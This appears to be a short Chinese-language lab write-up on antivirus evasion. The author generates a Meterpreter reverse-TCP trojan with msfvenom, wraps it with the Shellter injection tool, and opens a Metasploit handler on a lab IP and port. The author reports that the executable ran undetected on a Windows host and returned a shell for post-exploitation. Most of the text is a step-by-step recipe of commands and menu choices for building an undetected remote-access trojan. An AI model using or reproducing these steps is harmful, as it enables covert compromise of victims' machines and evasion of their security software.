木馬免殺
Shellter是一個開源的免殺工具,利用動態Shellcode注入來實現免殺的效果,我是使用的shellter免殺,做的不是很好,跟大家分享一下我的實驗結果。
原理:
生成木馬文件,然后將生成的木馬文件與**shellter免殺工具**捆綁,然后設置監聽,將捆綁后的文件拷貝到WinXP系統中,雙擊后,發現攻擊成功,最后將該文件在騰訊哈勃分析系統上分析。
實驗環境:
Kali系統 ip地址為: 192.168.159.128
步驟:
* 在Kali生成一個hacker.exe的木馬文件。命令為:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4321 -f exe > /root/hacker.exe
* 下載安裝shellter免殺工具,切換到shellter文件夾下,執行shellter工具。(注意:直接執行shellter工具會不成功,因為Kali系統不支持運行.exe文件,所以我們需要安裝使用wine模擬Windows系統打開.exe文件。)
* 執行shellter工具之后,依次選擇
1. 選擇A
2. PE Target后面填寫/root/hacker.exe
3. 選擇Y
4. 選擇L
5. payload反彈選擇1
* 輸入攻擊機ip地址:192.168.159.128,端口為4321
* 輸入msfconsole進入metasploit。
* 進入監聽模塊。命令為use exploit/multi/handler
* 配置參數,設置payload反彈,設置lport,設置lhost。
* 開始監聽,run。
* 把Kali生成的hacker.exe復制到物理機,雙擊,系統沒有報毒。
* 返回Kali,會看到回彈了信息,攻擊成功進入到meterpreter,可以進行后滲透。